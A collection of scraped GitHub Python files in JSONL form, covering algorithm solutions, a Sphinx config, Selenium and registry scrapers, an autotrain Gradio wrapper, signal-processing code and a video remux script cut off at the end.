+{"seq_id":"73403463688","text":"# https://www.acmicpc.net/problem/11021\n\nimport sys\nsys.stdin = open(\"11021_input.txt\", \"r\")\n\ntest_case = int(input()) # 맨 첫줄에 테스트 케이스 개수(5)가 주어진다\n\nfor _ in range(test_case):\n a, b = map(int, input().split())\n print(f'Case #{_+1}: {a+b}')","repo_name":"code-sum/Algorithm","sub_path":"BOJ/220725/11021.py","file_name":"11021.py","file_ext":"py","file_size_in_byte":281,"program_lang":"python","lang":"ko","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"38525626048","text":"import json\nimport requests\nimport random\nimport pprint\nimport os\nimport sys\n\nfrom bip32keys.bip32keys import Bip32Keys\n\n\ndef post_user():\n\n # Get public and private keys pair from file\n with open(\"generated.json\") as keys:\n keys_list = json.load(keys)\n users_keys = random.choice(keys_list)\n\n public_key = users_keys[\"public_key\"]\n private_key = users_keys[\"private_key\"]\n\n print(f\"Your private keys is: {public_key}\")\n print(f\"Your public key is: {private_key}\")\n \n # Create message and dump the one to the json\n message = {\n \"email\": \"test@test.com\", \n \"phone\": \"123756349\", \n \"timestamp\": \"1535646214275\"\n }\n\n print(\"\\nYour message is: \")\n print(message)\n print(\"\\n\")\n \n data = {\n \"signature\": Bip32Keys.sign_message(json.dumps(message), private_key),\n \"public_key\": public_key,\n \"message\":message\n }\n\n create_account_url = f\"http://pdms2.robin8.io/api/accounts/\"\n\n print(create_account_url)\n # Request to the server\n response = requests.post(create_account_url, data=json.dumps(data))\n\n print(response.json())\n\n\n\nif __name__ == '__main__':\n folder = os.path.dirname(os.path.abspath(__file__))\n sys.path.append(folder)\n post_user()\n\n","repo_name":"Robin8Put/pmes","sub_path":"test_signature/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":1297,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"16"} +{"seq_id":"28785343182","text":"# 
-*-coding:utf-8-*-\n\"\"\"\n****************************************\nauthor:善待今天\ntime:2019/07/30 17:38\nfile:update_date.py\nsoftware:PyCharm Community Edition\nE-mail:2904504961@qq.com\nMotivational motto: Do difficult things and get something\n****************************************\n\"\"\"\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.wait import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\n\ndriver = webdriver.Chrome()\ndriver.maximize_window()\n\ndriver.get('https://www.12306.cn/index/')\n\njs = \"\"\"\nvar a = document.getElementById(\"fromStationText\");\nvar b = document.getElementById(\"fromStation\");\nvar c = document.getElementById(\"toStationText\");\nvar d = document.getElementById(\"toStation\");\nvar e = document.getElementById(\"train_date\");\na.value = arguments[0];\nb.value = arguments[1];\nc.value = arguments[2];\nd.value = arguments[3];\ne.readonly = false;\ne.value = arguments[4];\n\"\"\"\ndriver.execute_script(js,'上海','SHH','杭州东','HGH','2019-08-07')\n\nloc_find = (By.XPATH,'//a[@id=\"search_one\"]')\nWebDriverWait(driver,20).until(EC.visibility_of_element_located(loc_find))\ndriver.find_element(*loc_find).click()","repo_name":"cxh214917/web_test","sub_path":"web_class_20190726/update_date.py","file_name":"update_date.py","file_ext":"py","file_size_in_byte":1215,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"34416720989","text":"# -*- coding: utf-8 -*-\n#\n# Configuration file for the Sphinx documentation builder.\n#\n# This file does only contain a selection of the most common options. For a\n# full list see the documentation:\n# http://www.sphinx-doc.org/en/stable/config\n\n# -- Path setup --------------------------------------------------------------\n\n# If extensions (or modules to document with autodoc) are in another directory,\n# add these directories to sys.path here. If the directory is relative to the\n# documentation root, use os.path.abspath to make it absolute, like shown here.\n#\nimport os\n\n# -- Project information -----------------------------------------------------\n\nproject = \"DoWhy\"\ncopyright = \"2022, PyWhy contributors\"\nauthor = \"PyWhy community\"\nversion = os.environ.get(\"CURRENT_VERSION\")\n\n# Version Information (for version-switcher)\nnot_empty = lambda x: len(x) > 0\nto_tag_obj = lambda t: {\"name\": t, \"url\": f\"/dowhy/{t}/index.html\"}\nhas_doc = lambda t: os.path.exists(f\"../../dowhy-docs/{t}/index.html\")\n\ngit_tags = reversed(list(filter(not_empty, os.environ.get(\"TAGS\").split(\",\"))))\ndoc_tags = list(filter(has_doc, git_tags))\n\nhtml_context = {\n \"current_version\": {\"name\": os.environ.get(\"CURRENT_VERSION\")},\n \"versions\": {\n \"tags\": list(map(to_tag_obj, doc_tags)),\n \"branches\": [{\"name\": \"main\"}],\n },\n}\n\n# -- General configuration ---------------------------------------------------\n\n# If your documentation needs a minimal Sphinx version, state it here.\n#\n# needs_sphinx = '1.0'\n\n# Add any Sphinx extension module names here, as strings. 
They can be\n# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom\n# ones.\nextensions = [\n \"sphinx.ext.autodoc\",\n \"sphinx.ext.viewcode\",\n \"sphinx.ext.todo\",\n \"nbsphinx\",\n \"sphinx_rtd_theme\",\n \"sphinxcontrib.googleanalytics\",\n \"sphinx_copybutton\",\n \"sphinx_design\",\n]\n\n# sphinx-panels shouldn't add bootstrap css since the pydata-sphinx-theme\n# already loads it\npanels_add_bootstrap_css = False\n\ngoogleanalytics_id = \"G-B139P18WHM\"\ncopybutton_prompt_text = \">>> \"\n\nautodoc_mock_imports = [\"matplotlib\", \"causalml\", \"pymc3\", \"econml\"]\n\n# Add any paths that contain templates here, relative to this directory.\ntemplates_path = [\"_templates\"]\n\n# The suffix(es) of source filenames.\n# You can specify multiple suffix as a list of string:\n#\n# source_suffix = ['.rst', '.md']\nsource_suffix = \".rst\"\n\n# The master toctree document.\nmaster_doc = \"index\"\n\n# The language for content autogenerated by Sphinx. Refer to documentation\n# for a list of supported languages.\n#\n# This is also used if you do content translation via gettext catalogs.\n# Usually you set \"language\" from the command line for these cases.\nlanguage = \"en\"\n\n# List of patterns, relative to source directory, that match files and\n# directories to ignore when looking for source files.\n# This pattern also affects html_static_path and html_extra_path .\nexclude_patterns = [\n \"_build\",\n \"Thumbs.db\",\n \".DS_Store\",\n \".ipynb_checkpoints\",\n \"example_notebooks/dowhy_ranking_methods.ipynb\",\n \"example_notebooks/dowhy_twins_example.ipynb\",\n]\n\n# The name of the Pygments (syntax highlighting) style to use.\npygments_style = \"sphinx\"\n\n\n# -- Options for HTML output -------------------------------------------------\n\n# The theme to use for HTML and HTML Help pages. See the documentation for\n# a list of builtin themes.\n#\nhtml_theme = \"pydata_sphinx_theme\"\n\n# Theme options are theme-specific and customize the look and feel of a theme\n# further. For a list of options available for each theme, see the\n# documentation.\n#\nhtml_theme_options = {\"navbar_end\": [\"navbar-icon-links\", \"versions\"]}\n\n# Add any paths that contain custom static files (such as style sheets) here,\n# relative to this directory. They are copied after the builtin static files,\n# so a file named \"default.css\" will overwrite the builtin \"default.css\".\nhtml_static_path = [\"_static\"]\n\n# Custom sidebar templates, must be a dictionary that maps document names\n# to template names.\n#\n# The default sidebars (for documents that don't match any pattern) are\n# defined by theme itself. Builtin themes are using these templates by\n# default: ``['localtoc.html', 'relations.html', 'sourcelink.html',\n# 'searchbox.html']``.\n#\n# html_sidebars = {}\n\n\n# -- Options for HTMLHelp output ---------------------------------------------\n\n# Output file base name for HTML help builder.\nhtmlhelp_basename = \"dowhydoc\"\n\nhtml_logo = \"_static/dowhy-logo-small.png\"\n\n# -- Options for LaTeX output ------------------------------------------------\n\nlatex_elements = {\n # The paper size ('letterpaper' or 'a4paper').\n #\n # 'papersize': 'letterpaper',\n # The font size ('10pt', '11pt' or '12pt').\n #\n # 'pointsize': '10pt',\n # Additional stuff for the LaTeX preamble.\n #\n # 'preamble': '',\n # Latex figure (float) alignment\n #\n # 'figure_align': 'htbp',\n}\n\n# Grouping the document tree into LaTeX files. 
List of tuples\n# (source start file, target name, title,\n# author, documentclass [howto, manual, or own class]).\nlatex_documents = [\n (master_doc, \"dowhy.tex\", \"dowhy Documentation\", \"Author\", \"manual\"),\n]\n\n\n# -- Options for manual page output ------------------------------------------\n\n# One entry per manual page. List of tuples\n# (source start file, name, description, authors, manual section).\nman_pages = [(master_doc, \"dowhy\", \"dowhy Documentation\", [author], 1)]\n\n\n# -- Options for Texinfo output ----------------------------------------------\n\n# Grouping the document tree into Texinfo files. List of tuples\n# (source start file, target name, title, author,\n# dir menu entry, description, category)\ntexinfo_documents = [\n (master_doc, \"dowhy\", \"dowhy Documentation\", author, \"dowhy\", \"One line description of project.\", \"Miscellaneous\"),\n]\n\n\n# -- Options for Epub output -------------------------------------------------\n\n# Bibliographic Dublin Core info.\nepub_title = project\nepub_author = author\nepub_publisher = author\nepub_copyright = copyright\n\n# The unique identifier of the text. This can be a ISBN number\n# or the project homepage.\n#\n# epub_identifier = ''\n\n# A unique identification for the text.\n#\n# epub_uid = ''\n\n# A list of files that should not be packed into the epub file.\nepub_exclude_files = [\"search.html\"]\n\n\n# -- Extension configuration -------------------------------------------------\n\n# -- Options for todo extension ----------------------------------------------\n\n# If true, `todo` and `todoList` produce output, else they produce nothing.\ntodo_include_todos = True\n\n# init docstrings should also be included in class\nautoclass_content = \"both\"\n\n# Only uncomment for faster testing/building docs without compiling notebooks\n# nbsphinx_execute = \"never\"\n","repo_name":"py-why/dowhy","sub_path":"docs/source/conf.py","file_name":"conf.py","file_ext":"py","file_size_in_byte":6749,"program_lang":"python","lang":"en","doc_type":"code","stars":6335,"dataset":"github-code","pt":"16"} +{"seq_id":"5698794590","text":"class Solution:\n def numOfSubarrays(self, arr: List[int], k: int, threshold: int) -> int:\n prefixSum = [0]\n sumVal, count = 0, 0\n for num in arr:\n sumVal += num\n prefixSum.append(sumVal)\n \n for i in range(len(prefixSum)-k):\n if prefixSum[i+k]-prefixSum[i] >= threshold*k:\n count += 1\n return count","repo_name":"jayaprakash-a/coding-prepation","sub_path":"leetcode/Problems/1343--Number-of-Sub-arrays-of-Size-K-and-Average-Greater-than-or-Equal-to-Threshold-Medium.py","file_name":"1343--Number-of-Sub-arrays-of-Size-K-and-Average-Greater-than-or-Equal-to-Threshold-Medium.py","file_ext":"py","file_size_in_byte":394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"22220632026","text":"import lotr\nimport groupme\n\ndef SendMessage():\n message = lotr.message_to_send\n print(message)\n inp = input(\"Do you want to send this one? 
Y/N\")\n if inp.upper() == 'Y':\n groupme.MessageGroup(groupme.group, message)\n \n \n\nif __name__ == '__main__':\n SendMessage()","repo_name":"plaughlin98/LOTR-GroupMe","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":293,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"2797029911","text":"#!/usr/bin/env python3\n\"\"\"Provides a class ``DeepNeuralNetwork'' for binary classification\"\"\"\n# pylint: disable=invalid-name\n\nimport numpy as np\n\n\nclass DeepNeuralNetwork:\n \"\"\"Represents a deep neural network for binary classification\"\"\"\n\n def __init__(self, nx, layers):\n \"\"\"\n Initializes a binary classification neuron\n Arguments:\n nx: the number of input features\n layers: a list representing the number of nodes in each layer\n \"\"\"\n if isinstance(nx, int) is False:\n raise TypeError(\"nx must be an integer\")\n if nx < 1:\n raise ValueError(\"nx must be a positive integer\")\n\n if isinstance(layers, list) is False or len(layers) < 1:\n raise TypeError(\"layers must be a list of positive integers\")\n\n self.__L = len(layers)\n self.__cache = {}\n self.__weights = {}\n d1 = nx\n for index, d0 in enumerate(layers, 1):\n if isinstance(d0, int) is False or d0 < 1:\n raise TypeError(\"layers must be a list of positive integers\")\n key = 'W{}'.format(index)\n self.__weights[key] = np.random.randn(d0, d1) * np.sqrt(2 / d1)\n key = 'b{}'.format(index)\n self.__weights[key] = np.zeros((d0, 1))\n d1 = d0\n\n @property\n def L(self):\n \"\"\"\n Get the number of layers\n Return:\n the number of layers\n \"\"\"\n return self.__L\n\n @property\n def cache(self):\n \"\"\"\n Get the intermediary values of the network\n Return:\n the cache dictionary\n \"\"\"\n return self.__cache\n\n @property\n def weights(self):\n \"\"\"\n Get the weights and biases of the network\n Return:\n the weights dictionary\n \"\"\"\n return self.__weights\n","repo_name":"patrickdeyoreo/holbertonschool-machine_learning","sub_path":"old/supervised_learning/0x00-binary_classification/17-deep_neural_network.py","file_name":"17-deep_neural_network.py","file_ext":"py","file_size_in_byte":1855,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"39262887710","text":"# -*- coding: utf-8 -*-\n# 互联网药品信息服务\n\nimport pickle\nimport re\nfrom selenium import webdriver\nfrom gjypjd.utils import *\nimport json\nimport time\n\ndef main():\n option = None\n mysql_db = DataBase()\n # 配置文件中开启是否无头,生产阶段关闭\n if if_headless():\n option = webdriver.ChromeOptions()\n option.add_argument(argument='headless')\n option.add_argument('--no-sandbox')\n\n for i in range(1, 1041): # 遍历1040个一级目录网页\n try:\n browser = webdriver.Chrome(chrome_options=option)\n url_1 = 'http://app1.sfda.gov.cn/datasearchcnda/face3/search.jsp?tableId=28&State=1&bcId=152912030752488832300204864740&State=1&curstart='+str(i)+'&State=1&tableName=TABLE28&State=1&viewtitleName=COLUMN212&State=1&viewsubTitleName=COLUMN210&State=1&tableView=%25E4%25BA%2592%25E8%2581%2594%25E7%25BD%2591%25E8%258D%25AF%25E5%2593%2581%25E4%25BF%25A1%25E6%2581%25AF%25E6%259C%258D%25E5%258A%25A1&State=1&cid=0&State=1&ytableId=0&State=1&searchType=search&State=1'\n browser.get(url_1)\n s = browser.page_source.replace('amp;', '')\n m = re.findall(r'content.jsp\\?tableId=28&tableName=TABLE28&tableView=互联网药品信息服务&Id=\\d+', s, re.M)\n browser.close()\n\n for j in range(len(m)):\n url_2 = 'http://app1.sfda.gov.cn/datasearchcnda/face3/' + m[j]\n 
browser = webdriver.Chrome(chrome_options=option)\n browser.get(url_2)\n sql = \"insert into t_hlwypxxfw(c_bh, dt_insertTime, c_url, b_content, c_json,c_page) VALUES (REPLACE(UUID(),\\\"-\\\",\\\"\\\"), sysdate(), %s,%s,%s,%s)\"\n mysql_db.exetcute_sql(sql, [url_2, browser.page_source, parse2json(browser.page_source),\n str(i) + '_' + str(j + 1)])\n\n # pickle.loads(s) 可用该方法将乱码汉字转换\n browser.close()\n except Exception as e:\n print(e)\n time.sleep(5)\n\n\ndef parse2json(html):\n \"\"\"\n 证书编号zsbh\n 服务性质fwxz\n 机构名称jgmc\n 法定代表fddb\n 网站负责人wzfzr\n 变更历史记录bglsjl\n 网站域名wzym\n 发证机关fzjg\n 有效起始日期yxqsrq\n 有效截至日期yxjzrq\n 证书状态zszt\n 地址邮编dzyb\n :return:json\n \"\"\"\n # 初始化,避免取不到的情况下为空值\n result_json = dict()\n # 批准文号\n reg_dict = dict()\n reg_dict['zsbh'] = r\"证书编号</td>\\s*<td.*>(.*)</td></tr>\"\n reg_dict['fwxz'] = r\"服务性质</td>\\s*<td.*>(.*)</td></tr>\"\n reg_dict['jgmc'] = r\"机构名称</td>\\s*<td.*>(.*)</td></tr>\"\n reg_dict['fddb'] = r\"法定代表</td>\\s*<td.*>(.*)</td></tr>\"\n reg_dict['wzfzr'] = r\"网站负责人</td>\\s*<td.*>(.*)</td></tr>\"\n reg_dict['bglsjl'] = r\"变更历史记录</td>\\s*<td.*>(.*)</td></tr>\"\n reg_dict['wzym'] = r\"网站域名</td>\\s*<td.*>(.*)</td></tr>\"\n reg_dict['fzjg'] = r\"发证机关</td>\\s*<td.*>(.*)</td></tr>\"\n reg_dict['yxqsrq'] = r\"有效起始日期</td>\\s*<td.*>(.*)</td></tr>\"\n reg_dict['yxjzrq'] = r\"有效截至日期</td>\\s*<td.*>(.*)</td></tr>\"\n reg_dict['zszt'] = r\"证书状态</td>\\s*<td.*>(.*)</td></tr>\"\n reg_dict['dzyb'] = r\"地址邮编</td>\\s*<td.*>(.*)</td></tr>\"\n\n\n for i, v in reg_dict.items():\n reg_search = re.search(v, html)\n if reg_search is not None:\n result_json[i] = reg_search.group(1)\n else:\n result_json[i] = ''\n return json.dumps(result_json, ensure_ascii=False)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"JohnWSY/crawlproject-gjypjd","sub_path":"gjypjd/hlwypxxfw.py","file_name":"hlwypxxfw.py","file_ext":"py","file_size_in_byte":3623,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"16"} +{"seq_id":"36785362737","text":"import gradio as gr\nimport os\nimport pandas as pd\nimport subprocess\n\ndef autotrain_llm(model_name, learning_rate, num_epochs, batch_size, block_size, trainer, warmup_ratio, weight_decay, gradient_accumulation, use_fp16, use_peft, use_int4, lora_r, lora_alpha, lora_dropout, push_to_hub, hf_token, repo_id, csv_file):\n # Save the uploaded CSV file\n if csv_file is None:\n return \"No CSV file uploaded. 
Please upload a CSV file to continue.\"\n\n# Check the size of the uploaded file\n df = pd.read_csv(csv_file.name, encoding='utf-8')\n print(df.to_string())\n # Write the DataFrame to data.csv\n csv_path = \"/workspace/data/train.csv\"\n df.to_csv(csv_path, index=False, encoding='utf-8')\n \n \n \n\n # Construct the command for training\n command = f\"\"\"\n autotrain llm --train --model {model_name} --project-name jainllama1 --data-path \"/workspace/data/\" --text-column text --lr {learning_rate} --batch-size {batch_size} --epochs {num_epochs} --block-size {block_size} --warmup-ratio {warmup_ratio} --lora-r {lora_r} --lora-alpha {lora_alpha} --lora-dropout {lora_dropout} --weight-decay {weight_decay} --gradient-accumulation {gradient_accumulation} {\"--fp16\" if use_fp16 else \"\"} {\"--use-peft\" if use_peft else \"\"} {\"--use-int4\" if use_int4 else \"\"} {\"--push-to-hub --token \" + hf_token + \" --repo-id \" + repo_id if push_to_hub else \"\"}\n \"\"\"\n # Start the process\n process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, text=True)\n\n# Print each line of the standard output as it's produced\n for line in iter(process.stdout.readline, ''):\n print(line, end='')\n\n# Wait for the process to complete\n process.wait()\n\n# Check for errors\n if process.returncode != 0:\n print(f\"The command exited with an error code: {process.returncode}\")\n\n # Return the result\n if result.returncode == 0:\n return \"Training complete!\"\n else:\n return f\"An error occurred: {result.stderr.decode()}\"\n\n# Define the Gradio interface\niface = gr.Interface(\n fn=autotrain_llm,\n inputs=[\n \n gr.Textbox(value=\"abhishek/llama-2-7b-hf-small-shards\", label=\"Model Name\"),\n gr.Slider(min=1e-5, max=1, step=1e-5, value=2e-4, label=\"Learning Rate\"),\n gr.Slider(min=1, max=100, value=1, label=\"Number of Epochs\"),\n gr.Slider(min=1, max=32, step=1, value=1, label=\"Batch Size\"),\n gr.Slider(min=1, max=2048, value=8, label=\"Block Size\"),\n gr.Dropdown(choices=[\"default\", \"sft\"], label=\"Trainer\", value=\"sft\"),\n gr.Slider(min=0, max=1, step=0.01, value=0.1, label=\"Warmup Ratio\"),\n gr.Slider(min=0, max=1, step=0.01, value=0.01, label=\"Weight Decay\"),\n gr.Slider(min=1, max=32, value=4, label=\"Gradient Accumulation\"),\n gr.Checkbox(value=True, label=\"Use FP16\"),\n gr.Checkbox(value=True, label=\"Use PEFT\"),\n gr.Checkbox(value=True, label=\"Use INT4\"),\n gr.Slider(min=1, max=64, value=16, label=\"Lora R\"),\n gr.Slider(min=1, max=64, value=32, label=\"Lora Alpha\"),\n gr.Slider(min=0, max=1, step=0.01, value=0.05, label=\"Lora Dropout\"),\n gr.Checkbox(value=False, label=\"Push to Hub\"),\n gr.Textbox(value=\"hf_XXX\", label=\"HF Token\"),\n gr.Textbox(value=\"username/repo_name\", label=\"Repo ID\"),\n \n gr.inputs.File(label=\"Upload CSV\"),\n ],\n outputs=\"text\",\n\n)\n\niface.launch(share=True,server_port=8888,debug=True)\n","repo_name":"allthingssecurity/FtaaS","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":3460,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"2775711569","text":"import requests\nimport json\n\ndef getuser(api_key):\n url = 'https://ghost.toxinum.xyz/api/v1/getuser'\n headers = {'Content-Type': 'application/json'}\n payload = {\n 'apiKey': api_key\n }\n data = json.dumps(payload)\n\n response = requests.post(url, headers=headers, data=data)\n\n if response.status_code == 200:\n return response.text\n else:\n 
return response.text","repo_name":"illusionghost3/ghostpip","sub_path":"ghostpip/getuser.py","file_name":"getuser.py","file_ext":"py","file_size_in_byte":401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"11965415904","text":"import numpy\ntry:\n import matplotlib.pyplot as pyplot\n pyplotOK = True\nexcept ImportError:\n pyplotOK = False\nfrom radialProfile import azimuthalAverageBins,radialAverageBins\n\ndef hanning2d(M, N):\n \"\"\"\nA 2D hanning window, as per IDL's hanning function. See numpy.hanning for the 1d description\n\"\"\"\n\n if N <= 1:\n return numpy.hanning(M)\n elif M <= 1:\n return numpy.hanning(N) # scalar unity; don't window if dims are too small\n else:\n return numpy.outer(numpy.hanning(M),numpy.hanning(N))\n\ndef power_spectrum(*args,**kwargs):\n \"\"\"\nThin wrapper of PSD2. Returns the 1D power spectrum in stead of the 2D Power Spectral Density\n\"\"\"\n kwargs['oned']=True\n return PSD2(*args,**kwargs)\n\ndef PSD2(image, image2=None, oned=False,\n fft_pad=False, real=False, imag=False,\n binsize=1.0, radbins=1, azbins=1, radial=False, hanning=False,\n wavnum_scale=False, twopi_scale=False, **kwargs):\n \"\"\"\nTwo-dimensional Power Spectral Density.\nNAN values are treated as zero.\n\nimage2 - can specify a second image if you want to see the cross-power-spectrum instead of the\npower spectrum.\noned - return radial profile of 2D PSD (i.e. mean power as a function of spatial frequency)\nfreq,zz = PSD2(image); plot(freq,zz) is a power spectrum\nfft_pad - Add zeros to the edge of the image before FFTing for a speed\nboost? (the edge padding will be removed afterwards)\nreal - Only compute the real part of the PSD (Default is absolute value)\nimag - Only compute the complex part of the PSD (Default is absolute value)\nhanning - Multiply the image to be PSD'd by a 2D Hanning window before performing the FTs.\nReduces edge effects. This idea courtesy Paul Ricchiazzia (May 1993), author of the\nIDL astrolib psd.pro\nwavnum_scale - multiply the FFT^2 by the wavenumber when computing the PSD?\ntwopi_scale - multiply the FFT^2 by 2pi?\nazbins - Number of azimuthal (angular) bins to include. Default is 1, or\nall 360 degrees. If azbins>1, the data will be split into [azbins]\nequally sized pie pieces. Azbins can also be a numpy array. See\nAG_image_tools.azimuthalAverageBins for details\nradial - An option to return the *azimuthal* power spectrum (i.e., the spectral power as a function\nof angle). 
Not commonly used.\nradbins - number of radial bins (you can compute the azimuthal power spectrum in different annuli)\n\"\"\"\n\n # prevent modification of input image (i.e., the next two lines of active code)\n image = image.copy()\n\n # remove NANs (but not inf's)\n image[image!=image] = 0\n\n if hanning:\n image = hanning2d(*image.shape) * image\n\n if image2 is None:\n image2 = image\n else:\n image2 = image2.copy()\n image2[image2!=image2] = 0\n if hanning:\n image2 = hanning2d(*image2.shape) * image2\n\n if real:\n psd2 = numpy.real( correlate2d(image,image2,return_fft=True,fft_pad=fft_pad) )\n elif imag:\n psd2 = numpy.imag( correlate2d(image,image2,return_fft=True,fft_pad=fft_pad) )\n else: # default is absolute value\n psd2 = numpy.abs( correlate2d(image,image2,return_fft=True,fft_pad=fft_pad) )\n # normalization is approximately (numpy.abs(image).sum()*numpy.abs(image2).sum())\n\n if wavnum_scale:\n wx = numpy.concatenate([ numpy.arange(image.shape[0]/2,dtype='float') , image.shape[0]/2 - numpy.arange(image.shape[0]/2,dtype='float') -1 ]) / (image.shape[0]/2.)\n wy = numpy.concatenate([ numpy.arange(image.shape[1]/2,dtype='float') , image.shape[1]/2 - numpy.arange(image.shape[1]/2,dtype='float') -1 ]) / (image.shape[1]/2.)\n wx/=wx.max()\n wy/=wy.max()\n wavnum = numpy.sqrt( numpy.outer(wx,numpy.ones(wx.shape))**2 + numpy.outer(numpy.ones(wy.shape),wx)**2 )\n psd2 *= wavnum\n\n if twopi_scale:\n psd2 *= numpy.pi * 2\n\n if radial:\n azbins,az,zz = radialAverageBins(psd2,radbins=radbins, interpnan=True, binsize=binsize, **kwargs)\n if len(zz) == 1:\n return az,zz[0]\n else:\n return az,zz\n\n if oned:\n return pspec(psd2, azbins=azbins, binsize=binsize, **kwargs)\n\n # else...\n return psd2\n\ndef pspec(psd2, return_index=True, wavenumber=False, return_stddev=False, azbins=1, binsize=1.0, view=False, **kwargs):\n \"\"\"\nCreate a Power Spectrum (radial profile of a PSD) from a Power Spectral Density image\n\nreturn_index - if true, the first return item will be the indexes\nwavenumber - if one dimensional and return_index set, will return a normalized wavenumber instead\nview - Plot the PSD (in logspace)?\n\"\"\"\n #freq = 1 + numpy.arange( numpy.floor( numpy.sqrt((image.shape[0]/2)**2+(image.shape[1]/2)**2) ) )\n\n azbins,(freq,zz) = azimuthalAverageBins(psd2,azbins=azbins,interpnan=True, binsize=binsize, **kwargs)\n if len(zz) == 1: zz=zz[0]\n # the \"Frequency\" is the spatial frequency f = 1/x for the standard numpy fft, which follows the convention\n # A_k = \\sum_{m=0}^{n-1} a_m \\exp\\left\\{-2\\pi i{mk \\over n}\\right\\}\n # or\n # F_f = Sum( a_m e^(-2 pi i f x_m) over the range m,m_max where a_m are the values of the pixels, x_m are the\n # indices of the pixels, and f is the spatial frequency\n freq = freq.astype('float') # there was a +1.0 here before, presumably to deal with div-by-0, but that shouldn't happen and shouldn't have been \"accounted for\" anyway\n\n if return_index:\n if wavenumber:\n fftwavenum = (numpy.fft.fftfreq(zz.size*2)[:zz.size])\n return_vals = list((fftwavenum,zz))\n #return_vals = list((len(freq)/freq,zz))\n else:\n return_vals = list((freq,zz))\n # return_vals = list((freq/len(freq),zz))\n else:\n return_vals = list(zz)\n if return_stddev:\n zzstd = azimuthalAverageBins(psd2,azbins=azbins,stddev=True,interpnan=True, binsize=binsize, **kwargs)\n return_vals.append(zzstd)\n\n if view and pyplotOK:\n pyplot.loglog(freq,zz)\n pyplot.xlabel(\"Spatial Frequency\")\n pyplot.ylabel(\"Spectral Power\")\n\n return 
return_vals\n\n####################################################################################\n\ndef correlate2d(im1,im2, boundary='wrap', **kwargs):\n \"\"\"\n Cross-correlation of two images of arbitrary size. Returns an image\n cropped to the largest of each dimension of the input images\n\n Options\n -------\n return_fft - if true, return fft(im1)*fft(im2[::-1,::-1]), which is the power\n spectral density\n fftshift - if true, return the shifted psd so that the DC component is in\n the center of the image\n pad - Default on. Zero-pad image to the nearest 2^n\n crop - Default on. Return an image of the size of the largest input image.\n If the images are asymmetric in opposite directions, will return the largest\n image in both directions.\n boundary: str, optional\n A flag indicating how to handle boundaries:\n * 'fill' : set values outside the array boundary to fill_value\n (default)\n * 'wrap' : periodic boundary\n\n WARNING: Normalization may be arbitrary if you use the PSD\n \"\"\"\n\n from astropy.convolve import convolve\n\n return convolve(np.conjugate(im1), im2[::-1, ::-1], normalize_kernel=False,\n boundary=boundary, ignore_edge_zeros=False, **kwargs)","repo_name":"hopehhchen/TurbuStat","sub_path":"turbustat/statistics/psds.py","file_name":"psds.py","file_ext":"py","file_size_in_byte":7238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"16"} +{"seq_id":"12198084858","text":"#!/usr/bin/env python\n\nimport subprocess\nimport sys\nimport os\nimport re\nimport json\nimport xmltodict\n\nimport remux\n\nvidFile = \"\"\n\nASPECT_RATIO = {\n \"1.33\" : \"4:3\",\n \"1.333\" : \"4:3\",\n \"1.77\" : \"16:9\",\n \"1.778\" : \"16:9\",\n}\n\n\nDVB_SIGNALING = {\n \"PAT\": 3008,\n \"PMT\": 3008,\n \"SDT\": 1500,\n \"NIT\": 1400,\n \"AIT\": 2000 #used by data carousel\n}\n\ndef getVideoID(vid_name):\n print(\"Getting Video ID...\\n\\n\")\n data = {}\n proc = subprocess.run(\"mediainfo --Output=XML \" + vid_name, shell=True, stdout=subprocess.PIPE);\n xml = proc.stdout\n my_dict_string = xmltodict.parse(xml)\n my_dict = json.dumps(my_dict_string, indent=4, sort_keys=True)\n my_dict = json.loads(my_dict)\n video_attrib = my_dict['MediaInfo']['media']['track']\n return video_attrib\n\ndef generateAVI(vid_ids): #AVI is well supported by ffmpeg\n general = vid_ids[0]\n vid = vid_ids[1]\n aud = vid_ids[2]\n print(\"Generating AVI...\\n\\n\")\n\n file_descriptors = {}\n file_descriptors[\"resolution\"] = '1280x720' #{}x{}'.format(vid['Sampled_Width'],vid['Sampled_Height'])\n file_descriptors[\"frameRate\"] = vid['FrameRate']\n file_descriptors[\"videoBitRate\"] = vid['BitRate']\n file_descriptors[\"aspectRatio\"] = ASPECT_RATIO[vid['DisplayAspectRatio']]\n file_descriptors[\"audioBitRate\"] = aud['BitRate']\n #file_descriptors['audioMaxBitRate'] = aud['BitRate_Maximum']\n file_descriptors[\"audioSamplingRate\"] = aud['SamplingRate']\n file_descriptors[\"MaxRate\"] = 5000000#int(general['OverallBitRate']) * 15 #max to millions place\n file_descriptors[\"file_name\"] = os.path.splitext( vidFile)[0] + \"_video\" + \".avi\" \n fps_initial = int(float(file_descriptors[\"frameRate\"])) \n if fps_initial < 25: #NTSC/TV 30fps\n file_descriptors[\"frameRate\"] = 25\n pts = (int(float(file_descriptors[\"frameRate\"])) / fps_initial)\n pts = int(1)\n file_descriptors['pts'] = pts\n tempo = fps_initial / int(float(file_descriptors[\"frameRate\"]))\n file_descriptors['tempo'] = tempo\n\n print(file_descriptors)\n # command = 'ffmpeg -i {} -b:v {} -r {} -s {} -aspect {} 
